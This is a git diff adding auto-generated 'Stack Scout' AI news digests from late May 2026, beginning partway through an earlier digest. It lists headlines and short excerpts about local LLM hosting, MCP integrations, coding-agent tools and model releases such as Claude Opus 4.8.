* Why the Rest of the World is Hard: A sales or marketing agent doesn’t… + +--- + +## [[R] What 1000+ Harness Experiments Taught Me About Self-Improving Agents [R]](https://reddit.com/r/MachineLearning/comments/1tpbp7m/r_what_1000_harness_experiments_taught_me_about/) +*Reddit r/MachineLearning* | 27/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> I recently wanted to see whether an AI agent could self-improve a harness to solve terminal bench tasks. It’s possible for an AI agent to propose a meaningful one-time change to the harness, but after experimenting with this for a couple of weeks, I think the continuous self-improvement is mostly an experiment-systems problem. The system needs a way to decide what kind of improvements can safely compound. Turns out there's a lot of parallels to coding-agent customization (e.g. SKILLS.md etc..) too. I wrote my experience of building such system here, including the successful and failure attempts during the process, and how I approached the self-improvement loop. It's not intended as a benchmark claim but more of a systems/research writeup. [https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/](https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/) + +--- + +## [Nvidia H100(94GB VRAM) - should I run llama.cpp or vllm for 30 users inference?](https://reddit.com/r/LocalLLaMA/comments/1tp7znr/nvidia_h10094gb_vram_should_i_run_llamacpp_or/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> I was given the great opportunity to borrow a H100 with 94GB VRAM at work until it is needed by a customer. (No idea how much system ram I will get, but I guess they are a bit flexible on this). \- I want to build a inference endpoint that can handle up to 30 users. \- I want a fairly reasonable big context, say 131,072-262,144. \- I think in most situations, realistically speaking, not more than 10-15 users will use it concurrently. 
\- Main use for this will be tools like Pi and OpenCode. Was thinking to use Qwen3.6-27B unless anyone can recommend a better one for agentic coding given the constrains. \- Should I use vllm or llama.cpp? Will llama.cpp able to handle the concurrency? \- If running on llama.cpp I would probably use UD-Q6\_K\_XL or UD-Q8\_K\_XL quant from Unsloth. \- If running on vllm I have no idea on what quant to use? Some advice here would be great. \- Is there any good tool to benchmark "concurrent users"? + +--- + +## [litellm vs any-llm (otari)](https://reddit.com/r/LocalLLaMA/comments/1tp6p5j/litellm_vs_anyllm_otari/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I am considering switching from litellm (sdk) to Mozilla’s [any-llm.](https://github.com/mozilla-ai/any-llm) They also have a proxy to go with it called [otari.](https://github.com/mozilla-ai/otari) On the face of it the repos looks a lot more well kept and stable (had a lot of issues with litellm before). Was wondering if others have already done similar and have positive or negative experiences + +--- + +## [Beating the $100 SDK Credit Cap: Parallel Orchestration and Extended Timeouts in Agent Fleets](https://reddit.com/r/ClaudeAI/comments/1tp1476/beating_the_100_sdk_credit_cap_parallel/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Anthropic’s impending shift to meter programmatic Agent SDK and `claude -p` usage under a rigid monthly credit allowance means developers have to start engineering for extreme token frugality and runtime efficiency. If your workflow engine blocks your entire system every time an agent runs a long file modification, your operational costs and development velocity take a massive hit. 
Flotilla v0.5.0 completely overhauls its background execution engine to maximize Claude's heavy-lifting potential while shielding your wallet from continuous credit drains: * **Non-Blocking Parallel Loops (v5)**: As mapped out in the blueprint, we swapped out sequential, blocking subprocess calls for an asynchronous process group manager tracking active workflows concurrently via non-blocking `Popen` execution. * **The 30-Minute Claude Safe-Window**: Complex multi-file engineering steps or Claude Code sessions frequently get choked out by standard tool limits. We replaced uniform global process constraints with an explicit per-agent map, extending Claude's runtime allowance to 1800s (30 minutes) to entirely eliminate `SIGTERM` / exit 143 mid-task terminations. * **Smart Local Delegation**: To keep you c… + +--- + +## [Claude Code has zero idea what your codebase looks like structurally (Open source with benchmarks)](https://reddit.com/r/ClaudeAI/comments/1tpbjwo/claude_code_has_zero_idea_what_your_codebase/) +*Reddit r/ClaudeAI* | 27/05/2026 | Score: 0.78 +Tags: mcp, open_source + +> Every time I watch someone use Claude Code on a real codebase, the same thing happens. It rewrites a module that three other modules depend on without any awareness of coupling. It just reads the file, makes changes, moves on It reads files one at a time without any map. Doesn't know which files are coupled. Doesn't know who owns what. Doesn't know why that weird pattern in the auth module exists on purpose. I've been building an open source MCP layer to fix this called repowise. Self-hosted, pip install, AGPL-3.0. Five context layers that sit between your codebase and the model: Graph - AST-based dependency graph. Knows what depends on what before it touches anything. Git - Hotspots, ownership, co-change patterns, bus factor. "This file always changes with these three other files. Docs - Auto-generated wiki from your code. Searchable. Decisions - Captures architectural intent. 
Why the code is shaped the way it is. Stops the model from "fixing" things that were intentional. Code Health - 12 biomarkers per file. Complexity, duplication, untested hotspots, declining trends. Zero LLM, pure static analysis. We ran a time-travel experiment on Django (542 files): scored every file, then… + +--- + +## [Millions of AI agents imperiled by critical vulnerability in open source package](https://arstechnica.com/information-technology/2026/05/millions-of-ai-agents-imperiled-by-critical-vulnerability-in-open-source-package/) +*Ars Technica AI* | Score: 0.74 +Tags: open_source, developer_tool + +--- + +## [CrankGPT by Squeez Labs - hand-cranked edge AI - talk about local AI!!!](https://reddit.com/r/LocalLLaMA/comments/1tpm7m3/crankgpt_by_squeez_labs_handcranked_edge_ai_talk/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: tool_update + +> I met Katrin from Squeez Labs at an event hosted by Pathway AI (the team behind Baby Dragon Hatchling) where she told me about CrankGPT, a literally hand-cranked device for running local LLMs. It's apparently real. It's appearently launched. It's apparently glorious. Check it out at [https://crankgpt.com/](https://crankgpt.com/) \- if anyone from Squeez Labs posts here and I'm stealing their thunder, I'll take the post down! But I've been really excited about this. So local you gotta squeez it with yer own armz. ;) [https://www.youtube.com/watch?v=HSapdLYpmWY](https://www.youtube.com/watch?v=HSapdLYpmWY) + +--- + +## [BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison [R]](https://reddit.com/r/MachineLearning/comments/1tpjx2m/beam_100k_memory_benchmark_csm_vs_hindsight_local/) +*Reddit r/MachineLearning* | 27/05/2026 | Score: 1.00 +Tags: open_source + +> \[R\] BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison I’m looking for feedback on a local agent-memory benchmark comparison, especially from people who care about evaluation methodology. 
I built an open-source R&D memory system called Context Swarm Memory (CSM). It uses bounded read-only memory shards, query routing, probe/recall/synthesis, cited packets, and explicit Committer-gated writes. The current comparison is against the accepted local Hindsight artifact on BEAM 100K: * CSM: 0.757573 AMB score, 342 / 400 correct * Hindsight: 0.733658 AMB score, 326 / 400 correct * CSM uses 38.2% fewer answer-visible context tokens * CSM is slower: 29.23s average retrieval vs 6.38s I want to be precise about the claim: This is not an official leaderboard claim. It is not a BEAM 10M claim. It is a committed local accepted-artifact comparison at 100K, and the next step should be independent replication or official chart acceptance. Repo: [https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory](https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory) Evidence and reproducibility notes: [https://muhamadjawdatsalemalakoum.github.io/context-swarm-me… + +--- + +## [Running real-time 1080p video generation and editing on your own (Dreamverse OSS release)](https://reddit.com/r/StableDiffusion/comments/1tpfbrl/running_realtime_1080p_video_generation_and/) +*Reddit r/StableDiffusion* | 27/05/2026 | Score: 1.00 +Tags: open_source + +> Hi guys, FastVideo team here again. Following up on our[ Dreamverse post](https://haoailab.com/blogs/dreamverse/), today we finally cleaned our code up and are excited to say that it's open source! Both the backend and frontend are out, so you can self-host the whole thing. B200s aren't exactly consumer hardware (we know), so the easiest path is to rent one from a cloud GPU provider. Once you've got access, spin up the server and start editing videos in your browser. There's also a mock backend in the repo if you want to hack on the UI without touching a GPU. 
The release covers the browser workspace, Python runtime for sessions and worker management, fMP4 streaming over websocket, prompt rewriting with safety filters, plus Docker images. The idea is that it can also serve as a sample architecture for anyone building their own real-time video gen apps. One more thing before you go. On the RTX 5090 side, we've gotten Wan2.1 1.3B running in under 2s on a single 5090, and we're working on integrating it into Dreamverse so y'all don't need a B200 to play with this. More on that soon :) Repo: [https://github.com/hao-ai-lab/FastVideo/tree/main/apps/dreamverse](https://github.com/hao-ai-l… + +--- + +## [Qwen3.6 huge quality gain from Q4 to Q6 for coding agent](https://reddit.com/r/LocalLLaMA/comments/1tpebhw/qwen36_huge_quality_gain_from_q4_to_q6_for_coding/) +*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 +Tags: agent_tool + +> So, last week I tried to update my unused local LLM setup. I had to stop using it because quality was too low and deepseek was too cheap. First thing I stopped using Ollama and now I only use llama.cpp built in server that works really great. The quality improvement from Q4 to Q6 is outstanding and finally a local LLM server can work very similarly to paid APIs. That's great! And MTP makes a big performance gain, on a dual 3090 (downvolted and limited to 65°C) it generates from 20 to 50 tokens per second with minimal heat generation. So yes, that time has finally arrived! 
Local coding agents are a thing and they work 😎 + +--- + diff --git a/data/digest-2026-05-28.md b/data/digest-2026-05-28.md new file mode 100644 index 0000000..83ddda6 --- /dev/null +++ b/data/digest-2026-05-28.md @@ -0,0 +1,121 @@ +# Stack Scout - AI News Digest +**2026-05-28** | 15 stories | Auto-generated from 714 archived stories + +--- + +## [Claude Code 2.1.153 Open Changelog Reflects Anthropic's Transparent Developer Tooling Strategy](https://x.com/ClaudeCodeLog/status/2059802880811434228) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: cli_tool, tool_update, agent_tool + +> Anthropic's commitment to publishing detailed Claude Code changelogs with every release enables developers to track improvements and plan migrations. Version 2.1.153 with 36 CLI changes reflects rapid iteration in the agentic coding space. + +--- + +## [I built and open-sourced Skill Index to organize & standardize your AI agent knowledge across Claude, Codex, Cursor, and more. 100% local and free on macOS.](https://reddit.com/r/ClaudeAI/comments/1tprx27/i_built_and_opensourced_skill_index_to_organize/) +*Reddit r/ClaudeAI* | 28/05/2026 | Score: 1.00 +Tags: mcp, open_source, agent_tool + +> I’ve been using Claude alongside other coding agents, and I kept running into the same problem: useful skills, MCPs, commands, hooks, and workflows start getting scattered across different tools. Sometimes Claude has the best version of something. Sometimes Codex or Cursor does. Sometimes an MCP is configured in one agent but missing or slightly different in another. Over time, it gets harder to treat your agent knowledge as one reusable system. So I built Skill Index: a free, open-source, 100% local macOS app for organizing and standardizing AI agent knowledge. The goal is to make it easier to bring reusable skills/MCPs/agent knowledge into Claude, while also keeping Claude’s own knowledge portable across the rest of your setup. 
It can help you: \- see where your skills and MCPs live \- compare what Claude, Codex, Cursor, Windsurf, and other agents can access \- standardize around a canonical definition of each skill/MCP \- keep your skills and MCPs in sync across every agent It’s local-first: no accounts, no cloud sync, no telemetry. Website: [https://skillindex.app](https://skillindex.app) GitHub: [https://github.com/arjitj2/skillindex](https://github.com/arjitj2/skillindex) + +--- + +## [MCP Servers / Connectors in Claude Desktop / Cowork via AWS Bedrock](https://reddit.com/r/ClaudeAI/comments/1tpxskx/mcp_servers_connectors_in_claude_desktop_cowork/) +*Reddit r/ClaudeAI* | 28/05/2026 | Score: 0.78 +Tags: mcp, developer_tool, cli_tool + +> While using MCP servers in the code CLI works with MCP servers, I'm having trouble using connectors or MCP servers in Cowork. Connecting to Jira or O365 seems not possible. With Bedrock, we don't have the Chat, but only the Cowork tab and also some additional settings are missing. I tried configuring the claude\_desktop\_config.json with MCP servers, but cowork doesn't seem to be able to use it. I can Import a manual plugin, but after a restart it seems gone and configuring it in cowork is not possible, the authentication doesn't work. Did anyone manage to get Connectors / MCP Servers / Plugins in Claude Desktop with Bedrock to work, and if so, how? + +--- + +## [Introducing Claude Opus 4.8](https://reddit.com/r/ClaudeAI/comments/1tq99mu/introducing_claude_opus_48/) +*Reddit r/ClaudeAI* | 28/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> We’re upgrading Claude Opus to a new version: Claude Opus 4.8. It builds on Opus 4.7 with sharper judgment, more honesty about its own progress, and the ability to work independently for longer than its predecessors. Available today for the same price. In Claude Code, you can hand off a feature, a migration, or a bug sweep and let it follow the work through while you focus on what’s next. 
Also launching today: * Fast mode for Opus 4.8 (research preview). Same model at roughly 2.5x the speed, now three times cheaper than before. * Dynamic workflows in Claude Code (research preview). Claude runs hundreds of parallel subagents in a single session and verifies its work before reporting back. * A new effort control on [claude.ai](http://claude.ai), so you can choose how much thinking Claude puts into a response. Claude Opus 4.8 is live today on [claude.ai](http://claude.ai), the Claude Platform, and all major cloud platforms. Read more: [anthropic.com/news/claude-opus-4-8](http://anthropic.com/news/claude-opus-4-8) + +--- + +## [I built an enforcement layer for AI coding agents using a local knowledge graph and hybrid RAG](https://reddit.com/r/LocalLLaMA/comments/1tq6sd0/i_built_an_enforcement_layer_for_ai_coding_agents/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> I know this sub is focused on local models but the architecture behind this applies to any LLM-powered coding agent, not just Claude Code. The problem: when you give a coding agent a large set of rules and standards, two things break. The context fills up with rules that aren't relevant to the current task, and nothing enforces compliance. The agent reads your instructions and decides what to follow. I built Writ to solve both. The knowledge layer: rules, skills, techniques, antipatterns, and playbooks live as nodes in a Neo4j knowledge graph with typed relationships between them. A five stage retrieval pipeline (BM25 over Tantivy, vector similarity over HNSW with a local ONNX embedding model, graph traversal, reciprocal rank fusion, context budget management) retrieves only what's relevant per task. Everything runs locally. No API calls for retrieval. The embedding model (all-MiniLM-L6-v2) runs through ONNX runtime, not PyTorch, so inference is fast without a GPU. The enforcement layer: 30 bash hook scripts intercept tool calls before execution. 
The agent can't write code without an approved plan, can't skip tests, can't say "tests pass" without running static analysis. These are… + +--- + +## [Kept context-switching between arxiv, OpenReview, GitHub, and HuggingFace for every paper, so I built this. Chrome extension + website with everything inline, plus citation graph + SPECTER2 neighbors. 3M papers, free, feedback welcome [P]](https://reddit.com/r/MachineLearning/comments/1tq53il/kept_contextswitching_between_arxiv_openreview/) +*Reddit r/MachineLearning* | 28/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com/) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use? + +--- + +## [Built a richer reading layer for arxiv (Chrome extension + web): OpenReview reviews, GitHub/HuggingFace links, citation graph, SPECTER2 neighbors, TLDRs. 
3M papers, free, looking for feedback [P]](https://reddit.com/r/MachineLearning/comments/1tq31yu/built_a_richer_reading_layer_for_arxiv_chrome/) +*Reddit r/MachineLearning* | 28/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use? + +--- + +## [SDXL image generation now works on iPhone. The bug that blocked it for months was a missing file check](https://reddit.com/r/StableDiffusion/comments/1tq302b/sdxl_image_generation_now_works_on_iphone_the_bug/) +*Reddit r/StableDiffusion* | 28/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> We've been building \[Off Grid\](https://github.com/alichherawalla/off-grid-mobile-ai) - open-source app for on-device AI (text + image gen, no cloud). SDXL on iPhone was broken for months. Users kept reporting it, we couldn't reproduce it consistently. 
Turns out: SDXL models ship in two UNet layouts: \- Monolithic: one big \`Unet.mlmodelc\` file \- Chunked: \`UnetChunk1.mlmodelc\` + \`UnetChunk2.mlmodelc\` Our validation code only checked for the monolithic layout. If you downloaded a chunked SDXL model (which most are), the app said "model invalid" and refused to load it. Months of reports. The fix was adding the chunked layout check — straightforward once we understood the problem. The app uses Apple's ml-stable-diffusion framework with CoreML. On an iPhone 15 Pro, you get SDXL images in about 30-45 seconds fully on-device. No internet needed at any point - the model lives on your phone. It's free and open source: \- GitHub: [https://github.com/alichherawalla/off-grid-mobile-ai](https://github.com/alichherawalla/off-grid-mobile-ai) \- iOS: [https://apps.apple.com/us/app/off-grid-local-ai/id6759299882](https://apps.apple.com/us/app/off-grid-local-ai/id6759299882) \- Android (SD… + +--- + +## [DSPy v3.3.0 Beta Brings ReActV2 to Open-Source AI Programming Framework](https://x.com/isaacbmiller1/status/2059828079371894786) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Stanford's DSPy framework released v3.3.0 beta on PyPI with ReActV2, improved LM/BaseLM architecture, and RLM data-passing support. DSPy is widely used for structured programming with language models in both research and production. + +--- + +## [Tencent WorkBuddy Global Launch Brings China's Top Desktop AI Agent to International Markets](https://x.com/TencentAI_News/status/2059827192964808922) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> Tencent's WorkBuddy desktop AI agent — already China's market leader — launches worldwide with autonomous handling of coding, analysis, and productivity tasks. The global launch challenges Microsoft Copilot, Cursor, and other Western enterprise AI assistants on their home turf. 
+ +--- + +## [Local run for multi users: which software set?](https://reddit.com/r/LocalLLaMA/comments/1tq0cj7/local_run_for_multi_users_which_software_set/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> Context: I am testing and running local LLM on Linux for some months, first with llama.cpp and now with vLLM for better concurrent capabilities. I use llama-swap in front of either vLLM or llama.cpp in order to have thinking and non-thinking variants exposed with all inference parameters adjusted according to the model requirements. My needs: now, I would like to make the LLM available to multiple (less than 10) users, outside from the local network: https access, web chat interface with either connection or api-key, API access with api-key. What I tried: * apache as frontend proxy: handle SSL part and redirect to internal applications as unsecured connections. * LibreChat as web user interface * llama-swap * vLLM Observed problems: * concurrency is limited to 10 requests (llama-swap limitation, either find how to raise this value or good alternative) * LibreChat only gives web interface, still need API access with keys management. Which open source software set do you use to serve multiple users? Do you know simple keys management tools? Did I miss something? Thank for any help! 
+ +--- + +## [OpenAI releases secure tunnels to connect private Model Context Protocol servers without modifying inbound firewalls. Outbound-only HTTPS tunnels secure the connection to OpenAI.](https://www.digg.com/ai/28n5w7d2) +*Digg AI* | Score: 1.00 +Tags: mcp, product_launch + +--- + +## [Genesis AI launches Genesis World 1.0, an open-source robotics simulator that turns one hour of real-world testing into 100 simulation days. It features GPU-accelerated physics solvers and path-traced rendering](https://www.digg.com/ai/tuo1sird) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Vulnerability found in framework used by VLLM, many MCP servers, and other LLM tools](https://reddit.com/r/LocalLLaMA/comments/1tpp2th/vulnerability_found_in_framework_used_by_vllm/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> Worth taking a look to see if this affects any of you. Surprised nobody has posted it yet. + +--- + +## [GH200 NVL2 or 8x RTX 6000 Blackwell for running Kimi K2.6 / DeepSeek V4 locally? (5 devs, agentic coding)](https://reddit.com/r/LocalLLaMA/comments/1tpp0a7/gh200_nvl2_or_8x_rtx_6000_blackwell_for_running/) +*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Trying to figure out the right box for my team and wanted to see if anyone had any clue which would be a better fit or if it is not worth our time in our budget. Situation: 5 of us doing agentic coding (lots of long context getting re-sent every turn, parallel tool calls, etc.) and we want to self-host the latest open MoE models — Kimi K2.6 and DeepSeek V4 class. My boss likes the idea of having it in house so no point in just saying pay the API (I did pitch that) Budget is around $100k - $150k. I'm stuck between a dual GH200 NVL2 (cheaper, \~1.2TB unified memory) (about 95k) and an 8x RTX 6000 Pro Blackwell build (768GB of actual fast VRAM, more expensive) (about 140k). 
To get real numbers I rented a single GH200 and tested Kimi K2.6 at a 2-bit quant. After some playing around I got it up to \~23 tok/s decode, which is not bad considering it is one GH200 with only 96gb of HBM, but I am not sure how it will scale to the dual GH200. The prefill was pretty slow yet again not sure how it will scale. The thing I keep coming back to: these models are too big to fit in HBM no matter what. Even the NVL2's 288GB HBM3e can't hold them, so the model partially lives in the slower unified mem… + +--- + diff --git a/data/digest-2026-05-29.md b/data/digest-2026-05-29.md new file mode 100644 index 0000000..bbd25dd --- /dev/null +++ b/data/digest-2026-05-29.md @@ -0,0 +1,111 @@ +# Stack Scout - AI News Digest +**2026-05-29** | 15 stories | Auto-generated from 468 archived stories + +--- + +## [Runway Exposes Gen-4.5, Kling, and GPT Image 2 via MCP — Creative Models Now Callable Inside Claude, Cursor, and Replit Agents](https://x.com/runtimewire/status/2059782827927810437) +*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 +Tags: mcp, tool_update, agent_tool + +> Runway plugged its creative model suite into Claude, ChatGPT, Cursor, and Replit via MCP, making image and video generation callable directly inside AI agent workflows. Runway Gen-4.5, Kling, and GPT Image 2 are all exposed through the integration. + +--- + +## [Kling AI Skill Launches for Agent Workflows — Text-to-Video, 4K Images, and Cross-Scene Consistency in Claude and Cursor](https://x.com/MayorKingAI/status/2044455291664695688) +*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 +Tags: product_launch, tool_update, agent_tool + +> Kling AI launched a dedicated Skill for AI agent workflows, enabling text/image to video generation, 4K image generation, style transfer, and cross-scene consistency with custom elements. Works natively with Claude, Cursor, Copilot, Codex, and OpenClaw. 
+ +--- + +## [Motion Launches Motion API — Connect the AI Motion Design Tool Directly Into Claude, Codex, OpenClaw, and Hermes](https://x.com/_adishj/status/2060028771399500237) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: api_update, product_launch, tool_update + +> Motion released the Motion API, enabling one-click integration of the AI motion design tool directly into Claude, Codex, OpenClaw, Hermes, and other AI frameworks. Agents can now generate motion design content as part of automated creative workflows. + +--- + +## [X Square Robot Releases Open-Source WALL-WM World Model For Embodied AI](https://www.digg.com/ai/v4d0ka2f) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Anthropic Releases Opus 4.8 With Strong Agentic Coding Benchmarks](https://www.digg.com/ai/6gzrebez) +*Digg AI* | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [ElevenLabs Launches Dubbing V2 — SOTA Audio-to-Audio Dubbing That Preserves Emotion in 90+ Languages](https://x.com/Carles_Reina/status/2060035887946248616) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> ElevenLabs introduced Dubbing V2, described as the world's state-of-the-art model for high-quality dubbing. The Audio-to-Audio model preserves the original speaker's emotion and intent across 90+ languages. Available now through ElevenCreative, with API access coming soon. + +--- + +## [Hexo Releases SIA — Open-Source Self-Improving AI That Updates Its Own Weights During Goal Pursuit](https://x.com/kunalbhatia91/status/2060013228231725092) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: product_launch, open_source + +> Hexo released SIA, an open-source Self-Improving AI that achieves goals through recursive self-improvement — updating its own capabilities as it works toward a goal, not just calling tools with fixed capabilities. The announcement earned 221 likes and 80,000 views. 
+ +--- + +## [Shift Launches in NYC — AI Economy Startup Offers Free Home Cleaning to Bridge Today's Economy to the AI Abundance Era](https://x.com/bercankilic/status/2060043312606638245) +*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Shift launched in New York City with a mission to bridge the current economy into the AI economy where goods, services, and leisure become affordable through AI. The launch includes free home cleaning as the entry product. + +--- + +## [minWM: A Full-Stack Open-Source Framework for Real-Time Interactive Video World Models](https://paperswithcode.com/papers/2605.30263) +*Papers With Code* | Score: 0.90 +Tags: open_source, developer_tool + +--- + +## [DeepSeek's Deli Chen releases an LLM continual learning survey paper generated autonomously by the DeliAutoResearch system. It maps out self-improvement methods like STaR and o1.](https://www.digg.com/ai/xay55qwq) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [ElevenLabs Releases Dubbing V2 With Emotion-Preserving Multilingual Audio](https://www.digg.com/ai/hsa7ykbd) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [OpenAI launches Rosalind Biodefense, giving U.S. 
government agencies access to its specialized GPT-Rosalind model. The initiative focuses on defending against engineered pathogens.](https://www.digg.com/ai/dl0e6ofa) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Anthropic releases Claude Opus 4.8 with improved coding and agentic performance at the same price as Opus 4.7](https://www.digg.com/ai/a6c6c36e-38c7-4420-9908-d435740c4ac8) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [100% AI Product Videos Made in Under 5 Minutes Achieve Commercial Quality — Realism Framework Hits New Threshold](https://x.com/Mho_23/status/2048507307466658062) +*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 +Tags: developer_tool + +> AI-generated product videos made in under 5 minutes are reaching commercial marketing quality, with a realism framework demonstrating results compelling enough for real product ads. The UGC video format has become the clearest commercial use case for AI video generation. + +--- + +## [Garry Tan Endorses Hermes Agent Stack — YC President's 600-Like Post Signals Mainstream Adoption](https://x.com/garrytan/status/2052434681363321056) +*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 +Tags: open_source + +> Y Combinator President Garry Tan publicly endorsed his OpenClaw/Hermes Agent setup as significantly improved, with the post generating 600+ likes. The endorsement signals that open-source agent coordination has crossed from early adopter into mainstream developer infrastructure. 
+ +--- + diff --git a/data/digest-2026-05-30.md b/data/digest-2026-05-30.md new file mode 100644 index 0000000..41a7fd5 --- /dev/null +++ b/data/digest-2026-05-30.md @@ -0,0 +1,103 @@ +# Stack Scout - AI News Digest +**2026-05-30** | 15 stories | Auto-generated from 214 archived stories + +--- + +## [Show HN: VT Code – open-source terminal coding agent in Rust](https://github.com/vinhnx/VTCode) +*Hacker News* | 30/05/2026 | Score: 0.82 +Tags: open_source, cli_tool, agent_tool + +--- + +## [OpenAI releases Codex v26.527, enabling Windows computer use and remote desktop control from mobile devices. A new profile interface tracks token activity and usage statistics.](https://www.digg.com/ai/2cvxmdwh) +*Digg AI* | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [Oura Ring 5 Launches — 40% Smaller Than Ring 4, Blood Pressure Monitoring, Ships June 4 at $399](https://ouraring.com/blog/oura-ring-5) +*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Oura launched Ring 5, the world's smallest smart ring at 40% smaller than Ring 4, starting at 2 grams. New features include blood pressure change monitoring, sleep apnea detection, and an AI health coach. Ships June 4, $399. 
+ +--- + +## [Cursor Releases Developer Habits Report on AI Coding Trends](https://www.digg.com/ai/6jh7d90b) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Brilliant Launches Koji AI Tutor to Build Kids' Critical Thinking](https://www.digg.com/ai/9jzt6gwc) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Shift Launches Free NYC Cleaning to Gather Robotics Training Data](https://www.digg.com/ai/5ol0wuf6) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Mythos-Class AI Models Coming to All Customers in Weeks — Anthropic Confirms Safeguards Ready After Restricted Testing](https://www.bloomberg.com/news/articles/2026-05-28/anthropic-plans-wide-release-of-mythos-level-ai-models-in-weeks) +*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 +Tags: product_launch + +> Anthropic confirmed through Bloomberg and Axios that Mythos-class models — previously limited to select testers under Project Glasswing due to cyber capabilities — will reach general availability in coming weeks after completing safety validation. + +--- + +## [Mystery Company Burns $500M on Claude in One Month — Token Budget Collapse Exposes Enterprise AI Cost Controls Gap](https://www.tomshardware.com/tech-industry/ai/mystery-company-accidentally-blew-500-million-on-claude-ai-in-a-single-month) +*Aligned News (Scoble)* | 30/05/2026 | Score: 1.00 +Tags: api_update + +> An unidentified company accidentally spent $500 million on Claude API in a single month after failing to set usage limits on employee licenses, per Tom's Hardware and WSJ. Amazon's concurrent token leaderboard shutdown after employees gamed it reveals tokenmaxxing as a systemic enterprise risk. 
